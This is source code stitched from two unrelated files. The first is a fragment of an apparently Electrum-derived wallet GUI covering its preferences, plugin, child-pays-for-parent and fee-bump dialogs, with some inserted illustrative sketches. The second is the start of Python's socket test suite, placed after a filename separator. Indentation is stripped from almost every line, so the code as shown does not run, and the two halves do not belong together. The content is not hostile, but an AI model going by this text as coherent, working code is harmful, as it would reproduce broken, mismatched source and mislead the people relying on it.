d = WindowModalDialog(self, _('Preferences'))
vbox = QVBoxLayout()
tabs = QTabWidget()
gui_widgets = []
fee_widgets = []
tx_widgets = []
id_widgets = []
# language
lang_help = _('Select which language is used in the GUI (after restart).')
lang_label = HelpLabel(_('Language') + ':', lang_help)
lang_combo = QComboBox()
from electrum.i18n import languages
lang_combo.addItems(list(languages.values()))
lang_keys = list(languages.keys())
lang_cur_setting = self.config.get("language", '')
try:
index = lang_keys.index(lang_cur_setting)
except ValueError: # not in list
index = 0
lang_combo.setCurrentIndex(index)
if not self.config.is_modifiable('language'):
for w in [lang_combo, lang_label]: w.setEnabled(False)
def on_lang(x):
lang_request = list(languages.keys())[lang_combo.currentIndex()]
if lang_request != self.config.get('language'):
self.config.set_key("language", lang_request, True)
self.need_restart = True
lang_combo.currentIndexChanged.connect(on_lang)
gui_widgets.append((lang_label, lang_combo))
nz_help = _('Number of zeros displayed after the decimal point. For example, if this is set to 2, "1." will be displayed as "1.00"')
nz_label = HelpLabel(_('Zeros after decimal point') + ':', nz_help)
nz = QSpinBox()
nz.setMinimum(0)
nz.setMaximum(self.decimal_point)
nz.setValue(self.num_zeros)
if not self.config.is_modifiable('num_zeros'):
for w in [nz, nz_label]: w.setEnabled(False)
def on_nz():
value = nz.value()
if self.num_zeros != value:
self.num_zeros = value
self.config.set_key('num_zeros', value, True)
self.history_list.update()
self.address_list.update()
nz.valueChanged.connect(on_nz)
gui_widgets.append((nz_label, nz))
msg = '\n'.join([
_('Time based: fee rate is based on average confirmation time estimates'),
_('Mempool based: fee rate is targeting a depth in the memory pool')
]
)
fee_type_label = HelpLabel(_('Fee estimation') + ':', msg)
fee_type_combo = QComboBox()
fee_type_combo.addItems([_('Static'), _('ETA'), _('Mempool')])
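# combo index mapping: 0 = Static, 1 = ETA (time-based dynamic), 2 = Mempool (depth-based dynamic)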
fee_type_combo.setCurrentIndex((2 if self.config.use_mempool_fees() else 1) if self.config.is_dynfee() else 0)
def on_fee_type(x):
self.config.set_key('mempool_fees', x==2)
self.config.set_key('dynamic_fees', x>0)
self.fee_slider.update()
fee_type_combo.currentIndexChanged.connect(on_fee_type)
fee_widgets.append((fee_type_label, fee_type_combo))
feebox_cb = QCheckBox(_('Edit fees manually'))
feebox_cb.setChecked(self.config.get('show_fee', False))
feebox_cb.setToolTip(_("Show fee edit box in send tab."))
def on_feebox(x):
self.config.set_key('show_fee', x == Qt.Checked)
self.fee_adv_controls.setVisible(bool(x))
feebox_cb.stateChanged.connect(on_feebox)
fee_widgets.append((feebox_cb, None))
use_rbf = self.config.get('use_rbf', True)
use_rbf_cb = QCheckBox(_('Use Replace-By-Fee'))
use_rbf_cb.setChecked(use_rbf)
use_rbf_cb.setToolTip(
_('If you check this box, your transactions will be marked as non-final,') + '\n' + \
_('and you will have the possibility, while they are unconfirmed, to replace them with transactions that pay higher fees.') + '\n' + \
_('Note that some merchants do not accept non-final transactions until they are confirmed.'))
def on_use_rbf(x):
self.config.set_key('use_rbf', bool(x))
batch_rbf_cb.setEnabled(bool(x))
use_rbf_cb.stateChanged.connect(on_use_rbf)
fee_widgets.append((use_rbf_cb, None))
batch_rbf_cb = QCheckBox(_('Batch RBF transactions'))
batch_rbf_cb.setChecked(self.config.get('batch_rbf', False))
batch_rbf_cb.setEnabled(use_rbf)
batch_rbf_cb.setToolTip(
_('If you check this box, your unconfirmed transactions will be consolidated into a single transaction.') + '\n' + \
_('This will save fees.'))
def on_batch_rbf(x):
self.config.set_key('batch_rbf', bool(x))
batch_rbf_cb.stateChanged.connect(on_batch_rbf)
fee_widgets.append((batch_rbf_cb, None))
msg = _('OpenAlias record, used to receive coins and to sign payment requests.') + '\n\n'\
+ _('The following alias providers are available:') + '\n'\
+ '\n'.join(['https://cryptoname.co/', 'http://xmr.link']) + '\n\n'\
+ 'For more information, see https://openalias.org'
alias_label = HelpLabel(_('OpenAlias') + ':', msg)
alias = self.config.get('alias','')
alias_e = QLineEdit(alias)
def set_alias_color():
if not self.config.get('alias'):
alias_e.setStyleSheet("")
return
if self.alias_info:
alias_addr, alias_name, validated = self.alias_info
alias_e.setStyleSheet((ColorScheme.GREEN if validated else ColorScheme.RED).as_stylesheet(True))
else:
alias_e.setStyleSheet(ColorScheme.RED.as_stylesheet(True))
def on_alias_edit():
alias_e.setStyleSheet("")
alias = str(alias_e.text())
self.config.set_key('alias', alias, True)
if alias:
self.fetch_alias()
set_alias_color()
self.alias_received_signal.connect(set_alias_color)
alias_e.editingFinished.connect(on_alias_edit)
id_widgets.append((alias_label, alias_e))
# SSL certificate
msg = ' '.join([
_('SSL certificate used to sign payment requests.'),
_('Use setconfig to set ssl_chain and ssl_privkey.'),
])
if self.config.get('ssl_privkey') or self.config.get('ssl_chain'):
try:
SSL_identity = paymentrequest.check_ssl_config(self.config)
SSL_error = None
except BaseException as e:
SSL_identity = "error"
SSL_error = str(e)
else:
SSL_identity = ""
SSL_error = None
SSL_id_label = HelpLabel(_('SSL certificate') + ':', msg)
SSL_id_e = QLineEdit(SSL_identity)
SSL_id_e.setStyleSheet((ColorScheme.RED if SSL_error else ColorScheme.GREEN).as_stylesheet(True) if SSL_identity else '')
if SSL_error:
SSL_id_e.setToolTip(SSL_error)
SSL_id_e.setReadOnly(True)
id_widgets.append((SSL_id_label, SSL_id_e))
units = base_units_list
msg = (_('Base unit of your wallet.')
+ '\n1 FJC = 1000 mFJC. 1 mFJC = 1000 bits. 1 bit = 100 sat.\n'
+ _('This setting affects the Send tab, and all balance related fields.'))
unit_label = HelpLabel(_('Base unit') + ':', msg)
unit_combo = QComboBox()
unit_combo.addItems(units)
unit_combo.setCurrentIndex(units.index(self.base_unit()))
def on_unit(x, nz):
unit_result = units[unit_combo.currentIndex()]
if self.base_unit() == unit_result:
return
edits = self.amount_e, self.fee_e, self.receive_amount_e
amounts = [edit.get_amount() for edit in edits]
self.decimal_point = base_unit_name_to_decimal_point(unit_result)
self.config.set_key('decimal_point', self.decimal_point, True)
nz.setMaximum(self.decimal_point)
self.history_list.update()
self.request_list.update()
self.address_list.update()
for edit, amount in zip(edits, amounts):
edit.setAmount(amount)
self.update_status()
unit_combo.currentIndexChanged.connect(lambda x: on_unit(x, nz))
gui_widgets.append((unit_label, unit_combo))
block_explorers = sorted(util.block_explorer_info().keys())
msg = _('Choose which online block explorer to use for functions that open a web browser')
block_ex_label = HelpLabel(_('Online Block Explorer') + ':', msg)
block_ex_combo = QComboBox()
block_ex_combo.addItems(block_explorers)
block_ex_combo.setCurrentIndex(block_ex_combo.findText(util.block_explorer(self.config)))
def on_be(x):
be_result = block_explorers[block_ex_combo.currentIndex()]
self.config.set_key('block_explorer', be_result, True)
block_ex_combo.currentIndexChanged.connect(on_be)
gui_widgets.append((block_ex_label, block_ex_combo))
from electrum import qrscanner
system_cameras = qrscanner._find_system_cameras()
qr_combo = QComboBox()
qr_combo.addItem("Default","default")
for camera, device in system_cameras.items():
qr_combo.addItem(camera, device)
#combo.addItem("Manually specify a device", config.get("video_device"))
index = qr_combo.findData(self.config.get("video_device"))
qr_combo.setCurrentIndex(index)
msg = _("Install the zbar package to enable this.")
qr_label = HelpLabel(_('Video Device') + ':', msg)
qr_combo.setEnabled(qrscanner.libzbar is not None)
on_video_device = lambda x: self.config.set_key("video_device", qr_combo.itemData(x), True)
qr_combo.currentIndexChanged.connect(on_video_device)
gui_widgets.append((qr_label, qr_combo))
colortheme_combo = QComboBox()
colortheme_combo.addItem(_('Light'), 'default')
colortheme_combo.addItem(_('Dark'), 'dark')
index = colortheme_combo.findData(self.config.get('qt_gui_color_theme', 'default'))
colortheme_combo.setCurrentIndex(index)
colortheme_label = QLabel(_('Color theme') + ':')
def on_colortheme(x):
self.config.set_key('qt_gui_color_theme', colortheme_combo.itemData(x), True)
self.need_restart = True
colortheme_combo.currentIndexChanged.connect(on_colortheme)
gui_widgets.append((colortheme_label, colortheme_combo))
updatecheck_cb = QCheckBox(_("Automatically check for software updates"))
updatecheck_cb.setChecked(self.config.get('check_updates', False))
def on_set_updatecheck(v):
self.config.set_key('check_updates', v == Qt.Checked, save=True)
updatecheck_cb.stateChanged.connect(on_set_updatecheck)
gui_widgets.append((updatecheck_cb, None))
usechange_cb = QCheckBox(_('Use change addresses'))
usechange_cb.setChecked(self.wallet.use_change)
if not self.config.is_modifiable('use_change'): usechange_cb.setEnabled(False)
def on_usechange(x):
usechange_result = x == Qt.Checked
if self.wallet.use_change != usechange_result:
self.wallet.use_change = usechange_result
self.wallet.storage.put('use_change', self.wallet.use_change)
multiple_cb.setEnabled(self.wallet.use_change)
usechange_cb.stateChanged.connect(on_usechange)
usechange_cb.setToolTip(_('Using change addresses makes it more difficult for other people to track your transactions.'))
tx_widgets.append((usechange_cb, None))
def on_multiple(x):
multiple = x == Qt.Checked
if self.wallet.multiple_change != multiple:
self.wallet.multiple_change = multiple
self.wallet.storage.put('multiple_change', multiple)
multiple_change = self.wallet.multiple_change
multiple_cb = QCheckBox(_('Use multiple change addresses'))
multiple_cb.setEnabled(self.wallet.use_change)
multiple_cb.setToolTip('\n'.join([
_('In some cases, use up to 3 change addresses in order to break '
'up large coin amounts and obfuscate the recipient address.'),
            _('This may result in higher transaction fees.')
]))
multiple_cb.setChecked(multiple_change)
multiple_cb.stateChanged.connect(on_multiple)
tx_widgets.append((multiple_cb, None))
def fmt_docs(key, klass):
lines = [ln.lstrip(" ") for ln in klass.__doc__.split("\n")]
return '\n'.join([key, "", " ".join(lines)])
choosers = sorted(coinchooser.COIN_CHOOSERS.keys())
if len(choosers) > 1:
chooser_name = coinchooser.get_name(self.config)
msg = _('Choose coin (UTXO) selection method. The following are available:\n\n')
msg += '\n\n'.join(fmt_docs(*item) for item in coinchooser.COIN_CHOOSERS.items())
chooser_label = HelpLabel(_('Coin selection') + ':', msg)
chooser_combo = QComboBox()
chooser_combo.addItems(choosers)
i = choosers.index(chooser_name) if chooser_name in choosers else 0
chooser_combo.setCurrentIndex(i)
def on_chooser(x):
chooser_name = choosers[chooser_combo.currentIndex()]
self.config.set_key('coin_chooser', chooser_name)
chooser_combo.currentIndexChanged.connect(on_chooser)
tx_widgets.append((chooser_label, chooser_combo))
def on_unconf(x):
self.config.set_key('confirmed_only', bool(x))
conf_only = self.config.get('confirmed_only', False)
unconf_cb = QCheckBox(_('Spend only confirmed coins'))
unconf_cb.setToolTip(_('Spend only confirmed inputs.'))
unconf_cb.setChecked(conf_only)
unconf_cb.stateChanged.connect(on_unconf)
tx_widgets.append((unconf_cb, None))
def on_outrounding(x):
self.config.set_key('coin_chooser_output_rounding', bool(x))
enable_outrounding = self.config.get('coin_chooser_output_rounding', False)
outrounding_cb = QCheckBox(_('Enable output value rounding'))
outrounding_cb.setToolTip(
_('Set the value of the change output so that it has similar precision to the other outputs.') + '\n' +
_('This might improve your privacy somewhat.') + '\n' +
_('If enabled, at most 100 satoshis might be lost due to this, per transaction.'))
outrounding_cb.setChecked(enable_outrounding)
outrounding_cb.stateChanged.connect(on_outrounding)
tx_widgets.append((outrounding_cb, None))
# Fiat Currency
hist_checkbox = QCheckBox()
hist_capgains_checkbox = QCheckBox()
fiat_address_checkbox = QCheckBox()
ccy_combo = QComboBox()
ex_combo = QComboBox()
def update_currencies():
if not self.fx: return
currencies = sorted(self.fx.get_currencies(self.fx.get_history_config()))
ccy_combo.clear()
ccy_combo.addItems([_('None')] + currencies)
if self.fx.is_enabled():
ccy_combo.setCurrentIndex(ccy_combo.findText(self.fx.get_currency()))
def update_history_cb():
if not self.fx: return
hist_checkbox.setChecked(self.fx.get_history_config())
hist_checkbox.setEnabled(self.fx.is_enabled())
def update_fiat_address_cb():
if not self.fx: return
fiat_address_checkbox.setChecked(self.fx.get_fiat_address_config())
def update_history_capgains_cb():
if not self.fx: return
hist_capgains_checkbox.setChecked(self.fx.get_history_capital_gains_config())
hist_capgains_checkbox.setEnabled(hist_checkbox.isChecked())
def update_exchanges():
if not self.fx: return
b = self.fx.is_enabled()
ex_combo.setEnabled(b)
if b:
h = self.fx.get_history_config()
c = self.fx.get_currency()
exchanges = self.fx.get_exchanges_by_ccy(c, h)
else:
exchanges = self.fx.get_exchanges_by_ccy('USD', False)
ex_combo.blockSignals(True)
ex_combo.clear()
ex_combo.addItems(sorted(exchanges))
ex_combo.setCurrentIndex(ex_combo.findText(self.fx.config_exchange()))
ex_combo.blockSignals(False)
def on_currency(hh):
if not self.fx: return
b = bool(ccy_combo.currentIndex())
ccy = str(ccy_combo.currentText()) if b else None
self.fx.set_enabled(b)
if b and ccy != self.fx.ccy:
self.fx.set_currency(ccy)
update_history_cb()
update_exchanges()
self.update_fiat()
def on_exchange(idx):
exchange = str(ex_combo.currentText())
if self.fx and self.fx.is_enabled() and exchange and exchange != self.fx.exchange.name():
self.fx.set_exchange(exchange)
def on_history(checked):
if not self.fx: return
self.fx.set_history_config(checked)
update_exchanges()
self.history_model.refresh('on_history')
if self.fx.is_enabled() and checked:
self.fx.trigger_update()
update_history_capgains_cb()
def on_history_capgains(checked):
if not self.fx: return
self.fx.set_history_capital_gains_config(checked)
self.history_model.refresh('on_history_capgains')
def on_fiat_address(checked):
if not self.fx: return
self.fx.set_fiat_address_config(checked)
self.address_list.refresh_headers()
self.address_list.update()
update_currencies()
update_history_cb()
update_history_capgains_cb()
update_fiat_address_cb()
update_exchanges()
ccy_combo.currentIndexChanged.connect(on_currency)
hist_checkbox.stateChanged.connect(on_history)
hist_capgains_checkbox.stateChanged.connect(on_history_capgains)
fiat_address_checkbox.stateChanged.connect(on_fiat_address)
ex_combo.currentIndexChanged.connect(on_exchange)
fiat_widgets = []
fiat_widgets.append((QLabel(_('Fiat currency')), ccy_combo))
fiat_widgets.append((QLabel(_('Show history rates')), hist_checkbox))
fiat_widgets.append((QLabel(_('Show capital gains in history')), hist_capgains_checkbox))
fiat_widgets.append((QLabel(_('Show Fiat balance for addresses')), fiat_address_checkbox))
fiat_widgets.append((QLabel(_('Source')), ex_combo))
tabs_info = [
(fee_widgets, _('Fees')),
(tx_widgets, _('Transactions')),
(gui_widgets, _('General')),
(fiat_widgets, _('Fiat')),
(id_widgets, _('Identity')),
]
for widgets, name in tabs_info:
tab = QWidget()
grid = QGridLayout(tab)
grid.setColumnStretch(0,1)
for a,b in widgets:
i = grid.rowCount()
if b:
if a:
grid.addWidget(a, i, 0)
grid.addWidget(b, i, 1)
else:
grid.addWidget(a, i, 0, 1, 2)
tabs.addTab(tab, name)
vbox.addWidget(tabs)
vbox.addStretch(1)
vbox.addLayout(Buttons(CloseButton(d)))
d.setLayout(vbox)
# run the dialog
d.exec_()
if self.fx:
self.fx.trigger_update()
self.alias_received_signal.disconnect(set_alias_color)
run_hook('close_settings_dialog')
if self.need_restart:
self.show_warning(_('Please restart Electrum to activate the new GUI settings'), title=_('Success'))
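    # --- Illustrative sketch (editor's addition, not part of the original file) ---
    # The fee_type_combo index set in settings_dialog encodes two config flags:
    #   dynamic_fees=False                     -> 0 (Static)
    #   dynamic_fees=True, mempool_fees=False  -> 1 (ETA)
    #   dynamic_fees=True, mempool_fees=True   -> 2 (Mempool)
    @staticmethod
    def _fee_type_index_sketch(is_dynfee, use_mempool):
        # same expression as fee_type_combo.setCurrentIndex(...) above
        return (2 if use_mempool else 1) if is_dynfee else 0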
def closeEvent(self, event):
# It seems in some rare cases this closeEvent() is called twice
if not self.cleaned_up:
self.cleaned_up = True
self.clean_up()
event.accept()
def clean_up(self):
self.wallet.thread.stop()
if self.network:
self.network.unregister_callback(self.on_network)
self.network.unregister_callback(self.on_quotes)
self.network.unregister_callback(self.on_history)
self.config.set_key("is_maximized", self.isMaximized())
if not self.isMaximized():
g = self.geometry()
self.wallet.storage.put("winpos-qt", [g.left(),g.top(),
g.width(),g.height()])
self.config.set_key("console-history", self.console.history[-50:],
True)
if self.qr_window:
self.qr_window.close()
self.close_wallet()
self.gui_object.timer.timeout.disconnect(self.timer_actions)
self.gui_object.close_window(self)
def plugins_dialog(self):
self.pluginsdialog = d = WindowModalDialog(self, _('Electrum Plugins'))
plugins = self.gui_object.plugins
vbox = QVBoxLayout(d)
# plugins
scroll = QScrollArea()
scroll.setEnabled(True)
scroll.setWidgetResizable(True)
scroll.setMinimumSize(400,250)
vbox.addWidget(scroll)
w = QWidget()
scroll.setWidget(w)
w.setMinimumHeight(plugins.count() * 35)
grid = QGridLayout()
grid.setColumnStretch(0,1)
w.setLayout(grid)
settings_widgets = {}
def enable_settings_widget(p, name, i):
widget = settings_widgets.get(name)
if not widget and p and p.requires_settings():
widget = settings_widgets[name] = p.settings_widget(d)
grid.addWidget(widget, i, 1)
if widget:
widget.setEnabled(bool(p and p.is_enabled()))
def do_toggle(cb, name, i):
p = plugins.toggle(name)
cb.setChecked(bool(p))
enable_settings_widget(p, name, i)
run_hook('init_qt', self.gui_object)
for i, descr in enumerate(plugins.descriptions.values()):
full_name = descr['__name__']
prefix, _separator, name = full_name.rpartition('.')
p = plugins.get(name)
if descr.get('registers_keystore'):
continue
try:
cb = QCheckBox(descr['fullname'])
plugin_is_loaded = p is not None
cb_enabled = (not plugin_is_loaded and plugins.is_available(name, self.wallet)
or plugin_is_loaded and p.can_user_disable())
cb.setEnabled(cb_enabled)
cb.setChecked(plugin_is_loaded and p.is_enabled())
grid.addWidget(cb, i, 0)
enable_settings_widget(p, name, i)
cb.clicked.connect(partial(do_toggle, cb, name, i))
msg = descr['description']
if descr.get('requires'):
msg += '\n\n' + _('Requires') + ':\n' + '\n'.join(map(lambda x: x[1], descr.get('requires')))
grid.addWidget(HelpButton(msg), i, 2)
except Exception:
self.print_msg("error: cannot display plugin", name)
traceback.print_exc(file=sys.stdout)
grid.setRowStretch(len(plugins.descriptions.values()), 1)
vbox.addLayout(Buttons(CloseButton(d)))
d.exec_()
def cpfp(self, parent_tx, new_tx):
total_size = parent_tx.estimated_size() + new_tx.estimated_size()
d = WindowModalDialog(self, _('Child Pays for Parent'))
vbox = QVBoxLayout(d)
msg = (
"A CPFP is a transaction that sends an unconfirmed output back to "
"yourself, with a high fee. The goal is to have miners confirm "
"the parent transaction in order to get the fee attached to the "
"child transaction.")
vbox.addWidget(WWLabel(_(msg)))
msg2 = ("The proposed fee is computed using your "
"fee/kB settings, applied to the total size of both child and "
"parent transactions. After you broadcast a CPFP transaction, "
"it is normal to see a new unconfirmed transaction in your history.")
vbox.addWidget(WWLabel(_(msg2)))
grid = QGridLayout()
grid.addWidget(QLabel(_('Total size') + ':'), 0, 0)
        grid.addWidget(QLabel('%d bytes' % total_size), 0, 1)
max_fee = new_tx.output_value()
grid.addWidget(QLabel(_('Input amount') + ':'), 1, 0)
grid.addWidget(QLabel(self.format_amount(max_fee) + ' ' + self.base_unit()), 1, 1)
output_amount = QLabel('')
grid.addWidget(QLabel(_('Output amount') + ':'), 2, 0)
grid.addWidget(output_amount, 2, 1)
fee_e = BTCAmountEdit(self.get_decimal_point)
# FIXME with dyn fees, without estimates, there are all kinds of crashes here
def f(x):
a = max_fee - fee_e.get_amount()
output_amount.setText((self.format_amount(a) + ' ' + self.base_unit()) if a else '')
fee_e.textChanged.connect(f)
fee = self.config.fee_per_kb() * total_size / 1000
fee_e.setAmount(fee)
        grid.addWidget(QLabel(_('Fee') + ':'), 3, 0)
grid.addWidget(fee_e, 3, 1)
def on_rate(dyn, pos, fee_rate):
fee = fee_rate * total_size / 1000
fee = min(max_fee, fee)
fee_e.setAmount(fee)
fee_slider = FeeSlider(self, self.config, on_rate)
fee_slider.update()
grid.addWidget(fee_slider, 4, 1)
vbox.addLayout(grid)
vbox.addLayout(Buttons(CancelButton(d), OkButton(d)))
if not d.exec_():
return
fee = fee_e.get_amount()
if fee > max_fee:
self.show_error(_('Max fee exceeded'))
return
new_tx = self.wallet.cpfp(parent_tx, fee)
new_tx.set_rbf(True)
self.show_transaction(new_tx)
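    # --- Illustrative sketch (editor's addition, not part of the original file) ---
    # How the proposed CPFP fee above is derived; the numbers are hypothetical.
    # The fee rate applies to parent + child combined, and the result is capped
    # at the child's input value (max_fee = new_tx.output_value()).
    @staticmethod
    def _cpfp_fee_sketch(fee_per_kb=5000, total_size=350, max_fee=120000):
        # 5000 sat/kB * 350 bytes / 1000 = 1750 sat, well below the cap
        return min(max_fee, fee_per_kb * total_size / 1000)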
def bump_fee_dialog(self, tx):
is_relevant, is_mine, v, fee = self.wallet.get_wallet_delta(tx)
if fee is None:
self.show_error(_("Can't bump fee: unknown fee for original transaction."))
return
tx_label = self.wallet.get_label(tx.txid())
tx_size = tx.estimated_size()
d = WindowModalDialog(self, _('Bump Fee'))
vbox = QVBoxLayout(d)
vbox.addWidget(WWLabel(_("Increase your transaction's fee to improve its position in mempool.")))
vbox.addWidget(QLabel(_('Current fee') + ': %s'% self.format_amount(fee) + ' ' + self.base_unit()))
vbox.addWidget(QLabel(_('New fee' + ':')))
fee_e = BTCAmountEdit(self.get_decimal_point)
fee_e.setAmount(fee * 1.5)
vbox.addWidget(fee_e)
def on_rate(dyn, pos, fee_rate):
fee = fee_rate * tx_size / 1000
fee_e.setAmount(fee)
fee_slider = FeeSlider(self, self.config, on_rate)
vbox.addWidget(fee_slider)
cb = QCheckBox(_('Final'))
vbox.addWidget(cb)
vbox.addLayout(Buttons(CancelButton(d), OkButton(d)))
if not d.exec_():
return
is_final = cb.isChecked()
new_fee = fee_e.get_amount()
delta = new_fee - fee
if delta < 0:
self.show_error("fee too low")
return
try:
new_tx = self.wallet.bump_fee(tx, delta)
except CannotBumpFee as e:
self.show_error(str(e))
return
if is_final:
new_tx.set_rbf(False)
self.show_transaction(new_tx, tx_label)
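    # --- Illustrative sketch (editor's addition, not part of the original file) ---
    # The bump-fee flow above reasons in terms of the fee *increase* (delta):
    # the dialog pre-fills 1.5x the old fee, and wallet.bump_fee receives only
    # the difference. Hypothetical numbers:
    @staticmethod
    def _bump_fee_delta_sketch(old_fee=1000):
        new_fee = int(old_fee * 1.5)   # dialog's suggested starting amount
        return new_fee - old_fee       # 500 sat; negative deltas are refused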
def save_transaction_into_wallet(self, tx):
win = self.top_level_window()
try:
if not self.wallet.add_transaction(tx.txid(), tx):
win.show_error(_("Transaction could not be saved.") + "\n" +
_("It conflicts with current history."))
return False
except AddTransactionException as e:
win.show_error(e)
return False
else:
self.wallet.save_transactions(write=True)
# need to update at least: history_list, utxo_list, address_list
self.need_update.set()
msg = (_("Transaction added to wallet history.") + '\n\n' +
_("Note: this is an offline transaction, if you want the network "
"to see it, you need to broadcast it."))
win.msg_box(QPixmap(icon_path("offline_tx.png")), None, _('Success'), msg)
return True
|
test_socket.py
|
import unittest
from test import support
import errno
import io
import itertools
import socket
import select
import tempfile
import time
import traceback
import queue
import sys
import os
import platform
import array
import contextlib
from weakref import proxy
import signal
import math
import pickle
import struct
import random
import shutil
import string
import _thread as thread
import threading
try:
import multiprocessing
except ImportError:
multiprocessing = False
try:
import fcntl
except ImportError:
fcntl = None
HOST = support.HOST
# test unicode string and carriage return
MSG = 'Michael Gilfix was here\u1234\r\n'.encode('utf-8')
MAIN_TIMEOUT = 60.0
VSOCKPORT = 1234
AIX = platform.system() == "AIX"
try:
import _socket
except ImportError:
_socket = None
def get_cid():
if fcntl is None:
return None
try:
with open("/dev/vsock", "rb") as f:
r = fcntl.ioctl(f, socket.IOCTL_VM_SOCKETS_GET_LOCAL_CID, " ")
except OSError:
return None
else:
return struct.unpack("I", r)[0]
def _have_socket_can():
"""Check whether CAN sockets are supported on this host."""
try:
s = socket.socket(socket.PF_CAN, socket.SOCK_RAW, socket.CAN_RAW)
except (AttributeError, OSError):
return False
else:
s.close()
return True
def _have_socket_can_isotp():
"""Check whether CAN ISOTP sockets are supported on this host."""
try:
s = socket.socket(socket.PF_CAN, socket.SOCK_DGRAM, socket.CAN_ISOTP)
except (AttributeError, OSError):
return False
else:
s.close()
return True
def _have_socket_rds():
"""Check whether RDS sockets are supported on this host."""
try:
s = socket.socket(socket.PF_RDS, socket.SOCK_SEQPACKET, 0)
except (AttributeError, OSError):
return False
else:
s.close()
return True
def _have_socket_alg():
"""Check whether AF_ALG sockets are supported on this host."""
try:
s = socket.socket(socket.AF_ALG, socket.SOCK_SEQPACKET, 0)
except (AttributeError, OSError):
return False
else:
s.close()
return True
def _have_socket_qipcrtr():
"""Check whether AF_QIPCRTR sockets are supported on this host."""
try:
s = socket.socket(socket.AF_QIPCRTR, socket.SOCK_DGRAM, 0)
except (AttributeError, OSError):
return False
else:
s.close()
return True
def _have_socket_vsock():
"""Check whether AF_VSOCK sockets are supported on this host."""
ret = get_cid() is not None
return ret
@contextlib.contextmanager
def socket_setdefaulttimeout(timeout):
old_timeout = socket.getdefaulttimeout()
try:
socket.setdefaulttimeout(timeout)
yield
finally:
socket.setdefaulttimeout(old_timeout)
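# Illustrative usage of the context manager above (editor's sketch, not part
# of the original test file): the temporary default applies to sockets created
# inside the block, and the previous default is restored on exit.
def _demo_socket_setdefaulttimeout():
    with socket_setdefaulttimeout(5.0):
        s = socket.socket()
        assert s.gettimeout() == 5.0   # inherited from the temporary default
        s.close()
    # outside the block the old default (often None) is back in effect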
HAVE_SOCKET_CAN = _have_socket_can()
HAVE_SOCKET_CAN_ISOTP = _have_socket_can_isotp()
HAVE_SOCKET_RDS = _have_socket_rds()
HAVE_SOCKET_ALG = _have_socket_alg()
HAVE_SOCKET_QIPCRTR = _have_socket_qipcrtr()
HAVE_SOCKET_VSOCK = _have_socket_vsock()
# Size in bytes of the int type
SIZEOF_INT = array.array("i").itemsize
class SocketTCPTest(unittest.TestCase):
def setUp(self):
self.serv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.port = support.bind_port(self.serv)
self.serv.listen()
def tearDown(self):
self.serv.close()
self.serv = None
class SocketUDPTest(unittest.TestCase):
def setUp(self):
self.serv = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
self.port = support.bind_port(self.serv)
def tearDown(self):
self.serv.close()
self.serv = None
class ThreadSafeCleanupTestCase(unittest.TestCase):
"""Subclass of unittest.TestCase with thread-safe cleanup methods.
This subclass protects the addCleanup() and doCleanups() methods
with a recursive lock.
"""
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
self._cleanup_lock = threading.RLock()
def addCleanup(self, *args, **kwargs):
with self._cleanup_lock:
return super().addCleanup(*args, **kwargs)
def doCleanups(self, *args, **kwargs):
with self._cleanup_lock:
return super().doCleanups(*args, **kwargs)
class SocketCANTest(unittest.TestCase):
"""To be able to run this test, a `vcan0` CAN interface can be created with
the following commands:
# modprobe vcan
# ip link add dev vcan0 type vcan
# ifconfig vcan0 up
"""
interface = 'vcan0'
bufsize = 128
"""The CAN frame structure is defined in <linux/can.h>:
struct can_frame {
canid_t can_id; /* 32 bit CAN_ID + EFF/RTR/ERR flags */
__u8 can_dlc; /* data length code: 0 .. 8 */
__u8 data[8] __attribute__((aligned(8)));
};
"""
can_frame_fmt = "=IB3x8s"
can_frame_size = struct.calcsize(can_frame_fmt)
"""The Broadcast Management Command frame structure is defined
in <linux/can/bcm.h>:
struct bcm_msg_head {
__u32 opcode;
__u32 flags;
__u32 count;
struct timeval ival1, ival2;
canid_t can_id;
__u32 nframes;
struct can_frame frames[0];
}
`bcm_msg_head` must be 8 bytes aligned because of the `frames` member (see
    `struct can_frame` definition). Must use native, not standard, types for packing.
"""
bcm_cmd_msg_fmt = "@3I4l2I"
bcm_cmd_msg_fmt += "x" * (struct.calcsize(bcm_cmd_msg_fmt) % 8)
def setUp(self):
self.s = socket.socket(socket.PF_CAN, socket.SOCK_RAW, socket.CAN_RAW)
self.addCleanup(self.s.close)
try:
self.s.bind((self.interface,))
except OSError:
self.skipTest('network interface `%s` does not exist' %
self.interface)
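# Illustrative sketch (editor's addition, not part of the original file):
# packing and unpacking a classic CAN frame with the "=IB3x8s" layout that
# SocketCANTest documents above. can_id and data values are caller-supplied.
def _build_can_frame_sketch(can_id, data):
    # pad the payload to the fixed 8-byte data field
    return struct.pack(SocketCANTest.can_frame_fmt,
                       can_id, len(data), data.ljust(8, b'\x00'))
def _dissect_can_frame_sketch(frame):
    can_id, can_dlc, data = struct.unpack(SocketCANTest.can_frame_fmt, frame)
    return can_id, can_dlc, data[:can_dlc]   # trim padding using the DLC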
class SocketRDSTest(unittest.TestCase):
"""To be able to run this test, the `rds` kernel module must be loaded:
# modprobe rds
"""
bufsize = 8192
def setUp(self):
self.serv = socket.socket(socket.PF_RDS, socket.SOCK_SEQPACKET, 0)
self.addCleanup(self.serv.close)
try:
self.port = support.bind_port(self.serv)
except OSError:
self.skipTest('unable to bind RDS socket')
class ThreadableTest:
"""Threadable Test class
The ThreadableTest class makes it easy to create a threaded
client/server pair from an existing unit test. To create a
new threaded class from an existing unit test, use multiple
inheritance:
class NewClass (OldClass, ThreadableTest):
pass
This class defines two new fixture functions with obvious
purposes for overriding:
clientSetUp ()
clientTearDown ()
Any new test functions within the class must then define
tests in pairs, where the test name is preceded with a
'_' to indicate the client portion of the test. Ex:
def testFoo(self):
# Server portion
def _testFoo(self):
# Client portion
Any exceptions raised by the clients during their tests
are caught and transferred to the main thread to alert
the testing framework.
Note, the server setup function cannot call any blocking
functions that rely on the client thread during setup,
unless serverExplicitReady() is called just before
the blocking call (such as in setting up a client/server
    connection and performing the accept() in setUp()).
"""
def __init__(self):
# Swap the true setup function
self.__setUp = self.setUp
self.__tearDown = self.tearDown
self.setUp = self._setUp
self.tearDown = self._tearDown
def serverExplicitReady(self):
"""This method allows the server to explicitly indicate that
it wants the client thread to proceed. This is useful if the
server is about to execute a blocking routine that is
dependent upon the client thread during its setup routine."""
self.server_ready.set()
def _setUp(self):
self.wait_threads = support.wait_threads_exit()
self.wait_threads.__enter__()
self.server_ready = threading.Event()
self.client_ready = threading.Event()
self.done = threading.Event()
self.queue = queue.Queue(1)
